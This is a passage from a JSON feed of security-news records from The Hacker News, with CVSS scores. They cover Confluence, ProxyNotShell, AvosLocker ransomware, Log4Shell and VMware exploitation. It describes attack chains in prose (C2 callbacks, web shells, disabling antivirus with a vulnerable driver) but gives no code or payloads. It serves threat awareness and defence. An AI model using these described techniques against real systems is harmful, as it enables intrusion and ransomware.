([Log4Shell](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>)), Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>)), and on-premises Exchange servers ([ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>)).\n\nThe development is emblematic of an [ongoing trend](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>) where threat actors are increasingly capitalizing on newly disclosed critical vulnerabilities rather than exploiting publicly known, dated software flaws across a broad spectrum of targets.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-18T04:11:00", "type": "thn", "title": "Atlassian Confluence Flaw Being Used to Deploy Ransomware and Crypto Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-18T04:11:14", "id": "THN:0488E447E08622B0366A0332F848212D", "href": "https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-04T12:04:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh6538WifO-pQPlUhACBuUX_jTbrSpW305DDSQv2XtGhWolinz3L4Hgy3yckiql7NJG9L9tFcb9ZFIPr1a1yBf9bvlyuXOAhhxdrgegxaIMeSIxRzX7JFkUbAULNHo8UzppH76EuY77JOotsyc1FYph-TCqk5DAr4GPj--2TvKuoLT8Tucw6ssJeCOa/s728-e100/proxynotshell.jpg>)\n\nNicknamed ProxyNotShell, a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery (SSRF) vulnerability CVE-2022-41040 and a second vulnerability, CVE-2022-41082 that allows Remote Code Execution (RCE) when PowerShell is available to unidentified attackers.\n\nBased on ProxyShell, this new zero-day abuse risk leverage a chained attack similar to the one used in the 2021 ProxyShell attack that exploited the combination of multiple vulnerabilities - CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207 \u2013 to permit a remote actor to execute arbitrary code.\n\nDespite the potential severity of attacks using them, ProxyShell vulnerabilities are still on CISA's list of top 2021 routinely exploited vulnerabilities.\n\n## Meet ProxyNotShell \n\nRecorded on September 19, 2022, CVE-2022-41082 is an attack vector targeting Microsoft's Exchange Servers, enabling attacks of low complexity with low privileges required. Impacted services, if vulnerable, enable an authenticated attacker to compromise the underlying exchange server by leveraging existing exchange PowerShell, which could result in a full compromise.\n\nWith the help of CVE-2022-41040, another Microsoft vulnerability also recorded on September 19, 2022, an attacker can remotely trigger CVE-2022-41082 to remotely execute commands.\n\nThough a user needs to have the privilege to access CVE-2022-41040, which should curtail the vulnerability accessibility to attackers, the required level of privilege is low.\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that users [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure.\n\nBoth vulnerabilities were uncovered during an active attack against GTSC, a Vietnamese organization called GTSC, granting attackers access to some of their clients. Though neither vulnerability on its own is particularly dangerous, exploits chaining them together could potentially lead to catastrophic breaches.\n\nThe chained vulnerabilities could grant an outsider attacker the ability to read emails directly off an organization's server the ability to breach the organization with CVE-2022-41040 Remote Code Execution and implant malware on the organization's Exchange Server with CVE-2022-41082.\n\nThough it appears that attackers would need some level of authentication to activate the chained vulnerabilities exploit, the exact level of authentication required \u2013 rated \"Low\" by Microsoft \u2013 is not yet clarified. Yet, this required low authentication level should effectively prevent a massive, automated attack targeting every Exchange server around the globe. This hopefully will prevent a replay of the 2021 ProxyShell debacle.\n\nYet, finding a single valid email address/password combination on a given Exchange server should not be overly difficult, and, as this attack bypasses MFA or FIDO token validation to log into Outlook Web Access, a single compromised email address/password combination is all that is needed.\n\n## Mitigating ProxyNotShell Exposure\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that users [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure of unknown efficacy.\n\nBlocking incoming traffic to Exchange Servers holding critical asserts is also an option, though only practicable if such a measure does not impact vital operations and should ideally be perceived as a temporary measure pending Microsoft's issuance of a verified patch.\n\n## Assessing ProxyNotShell Exposure\n\nAs the current mitigation options are either of unverified efficacy or potentially damaging to the smooth running of operations, evaluating the degree of exposure to ProxyNotShell might prevent taking potentially disruptive unnecessary preventative measures, or indicate which assets to preemptively migrate to unexposed servers.\n\nCymulate Research Lab has developed a [custom-made assessment for ProxyNotShell](<https://cymulate.com/free-trial/>) that enable organizations to estimate exactly their degree of exposure to ProxyNotShell.\n\nA ProxyNotShell attack vector has been added to the advanced scenarios templates, and running it on your environment yields the necessary information to validate exposure \u2013 or lack thereof - to ProxyNotShell.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgOoxz7w2_H46l72-JIWEEozP6gnLHfSQt_wbm1RRkjB0NOn2rBaB0wW4-jBFx4wbMgPAmXZvOdPPwjnUFX2u8zbdJZLSXKMAoft6Skt3EXk_gH1ehXK9DLBpHKouidVH9WE9P1SQs3h-s1VAfGKtHqeXaxkjtGS4lDIItWgmQo1FSLk_6z6fV7ZtQw/s728-e100/222.png>)\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiqGWTwc-0vwEKrwSp1s7coId4IRI3KelQKVBG1iXsx0N32996O0Lprr0PA035V1oLkFpdjQ1euXlqcL0le7gsuWoWI9NSCEBW0Nj-OCQZn8ovDyuK-b-MtVYhjKmGIWuZO5IkdqNRBvKSiWttxGP46GmxjlZtpI_FSz2728WiqkvKTOoOJIp0KrjOH/s728-e100/111.png>)\n\nUntil verified patches are available from Microsoft, assessing exposure to ProxyNotShell to evaluate exactly which servers are potential targets is the most cost-efficient way to evaluate exactly which assets are exposed and devise targeted preemptive measures with maximum impact.\n\n_Note: This article is contributed by [Cymulate Research Labs](<https://cymulate.com/>)._\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T08:05:00", "type": "thn", "title": "ProxyNotShell \u2013 the New Proxy Hell?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-04T10:19:04", "id": "THN:54023E40C0AA4CB15793A39F3AF102AB", "href": "https://thehackernews.com/2022/10/proxynotshell-new-proxy-hell.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgX0lKnx5WdFoF_k4rJiFXzL8S6T7QacBw6YLYV-c3wmeack_LrSDflJj-tCiHWWDyuhvCRxff3JxsdWuCd7lCtomS2C0Mirl6h9_PazDFxXRjF9KAahOXfOCaW__Mzb9ltwXwFD0R-03BqrPy0D9gDWD-BXQOCmQdlraj-A-gPB1bJVOdRop98x2to/s728-e100/antimalware.jpg>)\n\nCybersecurity researchers have disclosed a new variant of the AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws. \n\n\"This is the first sample we observed from the U.S. with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys),\" Trend Micro researchers, Christoper Ordonez and Alvin Nieto, [said](<https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html>) in a Monday analysis.\n\n\"In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability (Log4shell) using Nmap [NSE script](<https://nmap.org/book/man-nse.html>).\"\n\n[AvosLocker](<https://thehackernews.com/2021/08/researchers-warn-of-4-new-ransomware.html>), one of the newer ransomware families to fill the vacuum left by [REvil](<https://thehackernews.com/2022/01/russia-arrests-revil-ransomware-gang.html>), has been linked to a number of attacks that targeted critical infrastructure in the U.S., including financial services and government facilities.\n\nA ransomware-as-a-service (RaaS) affiliate-based group first spotted in July 2021, AvosLocker goes beyond double extortion by auctioning data stolen from victims should the targeted entities refuse to pay the ransom.\n\nOther targeted victims claimed by the ransomware cartel are said to be located in Syria, Saudi Arabia, Germany, Spain, Belgium, Turkey, the U.A.E., the U.K., Canada, China, and Taiwan, according to an [advisory](<https://www.cisa.gov/uscert/ncas/current-activity/2022/03/22/fbi-and-fincen-release-advisory-avoslocker-ransomware>) released by the U.S. Federal Bureau of Investigation (FBI) in March 2022.\n\nTelemetry data gathered by Trend Micro [shows](<https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker>) that the food and beverage sector was the most hit industry between July 1, 2021 and February 28, 2022, followed by technology, finance, telecom, and media verticals.\n\nThe entry point for the attack is believed to have been facilitated by leveraging an exploit for a remote code execution flaw in Zoho's ManageEngine ADSelfService Plus software ([CVE-2021-40539](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>)) to run an HTML application ([HTA](<https://en.wikipedia.org/wiki/HTML_Application>)) hosted on a remote server.\n\n\"The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the [command-and-control] server to execute arbitrary commands,\" the researchers explained.\n\nThis includes retrieving an ASPX web shell from the server as well as an installer for the [AnyDesk](<https://thehackernews.com/2021/05/malvertising-campaign-on-google.html>) remote desktop software, the latter of which is used to deploy additional tools to scan the local network, terminate security software, and drop the ransomware payload.\n\nSome of the components copied to the infected endpoint are a Nmap script to scan the network for the Log4Shell remote code execution flaw ([CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>)) and a mass deployment tool called PDQ to deliver a malicious batch script to multiple endpoints. \n\nThe batch script, for its part, is equipped with a wide range of capabilities that allows it to disable Windows Update, Windows Defender, and Windows Error Recovery, in addition to preventing safe boot execution of security products, creating a new admin account, and launching the ransomware binary.\n\nAlso used is aswArPot.sys, a legitimate Avast anti-rootkit driver, to kill processes associated with different security solutions by weaponizing a now-fixed vulnerability in the driver the Czech company [resolved in June 2021](<https://forum.avast.com/index.php?topic=283231.0>).\n\n\"The decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege),\" the researchers pointed out. \"This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-03T05:50:00", "type": "thn", "title": "AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-03T05:50:32", "id": "THN:E7E8D45492BAD83E88C89D34F8502485", "href": "https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:49", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhxt34pnwkNBgdh1y4-6xfSP-mpRKSltUMdSLDF55Eno17d47MYCQMSDAGq2OZeCWpHDNnZUH8W1fIjZdtvlDKtRo_8406-8p3Tt1czUwjmnUWHQH1uhmjFu2w55IgERDhFTLDY9xJoJtni4DCbI0Mq1L1iwjJ2yLvaZvWMTnwKtZmlFsZO1DMdbQ0a>)\n\nThreat actors are actively [weaponizing](<https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/>) unpatched servers affected by the newly identified \"[**Log4Shell**](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>)\" vulnerability in Log4j to install cryptocurrency miners, Cobalt Strike, and recruit the devices into a botnet, even as telemetry signs point to exploitation of the flaw nine days before it even came to light.\n\nNetlab, the networking security division of Chinese tech giant Qihoo 360, [disclosed](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) threats such as [Mirai](<https://thehackernews.com/2016/11/ddos-attack-mirai-botnet.html>) and [Muhstik](<https://thehackernews.com/2018/05/botnet-malware-hacking.html>) (aka Tsunami) are setting their sights on vulnerable systems to spread the infection and grow its computing power to orchestrate distributed denial-of-service (DDoS) attacks with the goal of overwhelming a target and rendering it unusable. Muhstik was previously spotted exploiting a critical security flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), CVSS score: 9.8) earlier this September.\n\nThe latest development comes as it has emerged that the vulnerability has been under attack for at least more than a week prior to its public disclosure on December 10, and companies like [Auvik](<https://www.reddit.com/r/msp/comments/rdba36/critical_rce_vulnerability_is_affecting_java/>), [ConnectWise Manage](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>), and [N-able](<https://www.n-able.com/security-and-privacy/apache-log4j-vulnerability>) have confirmed their services are impacted, widening the scope of the flaw's reach to more manufacturers.\n\n\"Earliest evidence we've found so far of [the] Log4j exploit is 2021-12-01 04:36:50 UTC,\" Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) Sunday. \"That suggests it was in the wild at least nine days before publicly disclosed. However, don't see evidence of mass exploitation until after public disclosure.\" Cisco Talos, in an independent [report](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>), said it observed attacker activity related to the flaw beginning December 2.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgfMpATNB5GkuC13rGMq6XMiFBdOjwWBuD-ZOuvjNFP7YxSWaotzdhrzjdXbTIaMEp8-l6iWWDH92mwneLD8TjmjuxtRNakibAOsb2Bx7UplaRi0KIfAJe2kSIOkIyBGl9uSFCGFJoM8U83ckS-pICLmEcmdQGD1quBku8bU4z_kfoRubl5R-sNju8bog>)\n\nTracked [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (CVSS score: 10.0), the flaw concerns a case of remote code execution in Log4j, a Java-based open-source Apache logging framework broadly used in enterprise environments to record events and messages generated by software applications.\n\nAll that is required of an adversary to leverage the vulnerability is send a specially crafted string containing the malicious code that gets logged by Log4j version 2.0 or higher, effectively enabling the threat actor to load arbitrary code from an attacker-controlled domain on a susceptible server and take over control.\n\n\"The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers,\" Microsoft 365 Defender Threat Intelligence Team [said](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) in an analysis. \"Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives.\"\n\nIn particular, the Redmond-based tech giant said it detected a wealth of malicious activities, including installing Cobalt Strike to enable credential theft and lateral movement, deploying coin miners, and exfiltrating data from the compromised machines.\n\nThe situation has also left companies scrambling to roll out fixes for the bug. Network security vendor SonicWall, in an [advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032>), revealed its Email Security solution is affected, stating it's working to release a fix for the issue while it continues to investigate the rest of its lineup. Virtualization technology provider VMware, likewise, warned of \"[exploitation attempts in the wild](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>),\" adding that it's pushing out patches to a number of its products.\n\nIf anything, incidents like these illustrate how a single flaw, when uncovered in packages incorporated in a lot of software, can have ripple effects, acting as a channel for further attacks and posing a critical risk to affected systems. \"All threat actors need to trigger an attack is one line of text,\" Huntress Labs Senior Security Researcher John Hammond [said](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>). \"There's no obvious target for this vulnerability \u2014 hackers are taking a spray-and-pray approach to wreak havoc.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T05:10:00", "type": "thn", "title": "Apache Log4j Vulnerability \u2014 Log4Shell \u2014 Widely Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2021-12-13T14:58:24", "id": "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "href": "https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-24T07:57:31", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjSO96Yr-42fbrwo8Mz26dzReMLZBhBr-1y2b_cB3rt2ldR4iIM7XFpqSzVBRcP_q35yY85Ysv9PamOsQtEGalqVo2kEVwH_UJHgY50OISBQnM-3HRZhjpqha3plzcVxRynX38KP35JKE3M_erCFmCzEHH5doe8_AoevSX3BHQ1zu4iRmKbkVcli0En/s728-e100/log4shell.gif>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks.\n\n\"Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and [Unified Access Gateway] servers,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/23/malicious-cyber-actors-continue-exploit-log4shell-vmware-horizon>). \"As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command-and-control (C2).\"\n\nIn one instance, the adversary is said to have been able to move laterally inside the victim network, obtain access to a disaster recovery network, and collect and exfiltrate sensitive law enforcement data.\n\n[Log4Shell](<https://thehackernews.com/2022/05/hackers-exploiting-vmware-horizon-to.html>), tracked as [CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) (CVSS score: 10.0), is a remote code execution vulnerability affecting the Apache Log4j logging library that's used by a wide range of consumers and enterprise services, websites, applications, and other products.\n\nSuccessful exploitation of the flaw could enable an attacker to send a specially-crafted command to an affected system, enabling the actors to execute malicious code and seize control of the target.\n\nBased on information gathered as part of two incident response engagements, the agencies said that the attackers weaponized the exploit to drop rogue payloads, including PowerShell scripts and a remote access tool dubbed \"hmsvc.exe\" that's equipped with capabilities to log keystrokes and deploy additional malware.\n\n\"The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network,\" the agencies noted, adding it also offers a \"graphical user interface (GUI) access over a target Windows system's desktop.\"\n\nThe PowerShell scripts, observed in the production environment of a second organization, facilitated lateral movement, enabling the APT actors to implant loader malware containing executables that include the ability to remotely monitor a system's desktop, gain reverse shell access, exfiltrate data, and upload and execute next-stage binaries.\n\nFurthermore, the adversarial collective leveraged [CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>), a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager that came to light in April 2022, to deliver the Dingo J-spy web shell.\n\nOngoing Log4Shell-related activity even after more than six months suggests that the flaw is of high interest to attackers, including state-sponsored advanced persistent threat (APT) actors, who have opportunistically targeted unpatched servers to gain an initial foothold for follow-on activity.\n\nAccording to cybersecurity company ExtraHop, Log4j vulnerabilities have been subjected to relentless scanning attempts, with financial and healthcare sectors emerging as an outsized market for potential attacks.\n\n\"Log4j is here to stay, we will see attackers leveraging it again and again,\" IBM-owned Randori [said](<https://www.randori.com/blog/log4j-top-targets-report/>) in an April 2022 report. \"Log4j buried deep into layers and layers of shared third-party code, leading us to the conclusion that we'll see instances of the Log4j vulnerability being exploited in services used by organizations that use a lot of open source.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-24T03:36:00", "type": "thn", "title": "Log4Shell Still Being Exploited to Hack VMWare Servers to Exfiltrate Sensitive Data", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22954"], "modified": "2022-06-24T07:37:32", "id": "THN:E27BF56DBA34B1A89BD29AEB5A6D8405", "href": "https://thehackernews.com/2022/06/log4shell-still-being-exploited-to-hack.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-19T06:22:57", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjdo6Qyq6Cl_mWJDYZnviXPjIVW9fan7pRXKUukqzb6iq367-LOSVGv_1CUI04hyzkbzuY1-Bv4tKpxA3yDFc8Lo3BByd9UeB1zp9_Ge2Nlm5rKaqo8--9ilJOe_g_LpqeR3wzE9w91bZVrW48gh5XKFDhi4GGN9cpqc_6kGH6bHgEBLLpDdhoC2YpE/s728-e100/vmware.jpg>)\n\nVMware has issued patches to contain [two security flaws](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) impacting Workspace ONE Access, Identity Manager, and vRealize Automation that could be exploited to backdoor enterprise networks.\n\nThe first of the two flaws, tracked as CVE-2022-22972 (CVSS score: 9.8), concerns an authentication bypass that could enable an actor with network access to the UI to gain administrative access without prior authentication.\n\nCVE-2022-22973 (CVSS score: 7.8), the other bug, is a case of local privilege escalation that could enable an attacker with local access to elevate privileges to the \"root\" user on vulnerable virtual appliances.\n\n\"It is extremely important that you quickly take steps to patch or mitigate these issues in on-premises deployments,\" VMware [said](<https://core.vmware.com/vmsa-2022-0014-questions-answers-faq>).\n\nThe disclosure follows a [warning](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/18/cisa-issues-emergency-directive-and-releases-advisory-related>) from the U.S. Cybersecurity and Infrastructure Agency (CISA) that advanced persistent threat (APT) groups are exploiting CVE-2022-22954 and CVE-2022-22960 \u2014 two other VMware flaws that were [fixed](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>) [early last month](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>) \u2014 separately and in combination.\n\n\"An unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user,\" it said. \"The actor then exploited CVE-2022-22960 to escalate the user's privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems.\"\n\nOn top of that, the cybersecurity authority noted that threat actors have deployed post-exploitation tools such as the Dingo J-spy web shell in at least three different organizations.\n\nIT security company Barracuda Networks, in an [independent report](<https://blog.barracuda.com/2022/05/17/threat-spotlight-attempts-to-exploit-new-vmware-vulnerabilities/>), said it has observed consistent probing attempts in the wild for CVE-2022-22954 and CVE-2022-22960 soon after the shortcomings became public knowledge on April 6.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjaPrXn1XfHadatV2N4b_itqqrI2wEGgb0BlVgiL8DoxQNoPKFMnfIxeMPf_0BQY1aIj6xJ6Jzp3pdwxrAImifZhB6dWwKp3rkMKVhRr9ZN2DzQWx3gXATGFHXy-Y4ER1Kuj-ZLESMZcPE-O8zmbk7kkpS1n3OzP2U2I6LDrIX-56SfkimD7ARb8lWh/s728-e100/vmware.jpg>)\n\nMore than three-fourths of the attacker IPs, about 76%, are said to have originated from the U.S., followed by the U.K. (6%), Russia (6%), Australia (5%), India (2%), Denmark (1%), and France (1%).\n\nSome of the exploitation attempts recorded by the company involve botnet operators, with the threat actors leveraging the flaws to deploy variants of the [Mirai](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>) distributed denial-of-service (DDoS) malware.\n\nThe issues have also prompted CISA to issue an [emergency directive](<https://www.cisa.gov/emergency-directive-22-03>) urging federal civilian executive branch (FCEB) agencies to apply the updates by 5 p.m. EDT on May 23 or disconnect the devices from their networks.\n\n\"CISA expects threat actors to quickly develop a capability to exploit these newly released vulnerabilities in the same impacted VMware products,\" the agency said.\n\nThe patches arrive a little over a month after the company rolled out an update to resolve a critical security flaw in its Cloud Director product ([CVE-2022-22966](<https://thehackernews.com/2022/04/critical-vmware-cloud-director-bug.html>)) that could be weaponized to launch remote code execution attacks.\n\n### CISA warns of active exploitation of F5 BIG-IP CVE-2022-1388\n\nIt's not just VMware that's under fire. The agency has also released a follow-up advisory with regards to the active exploitation of 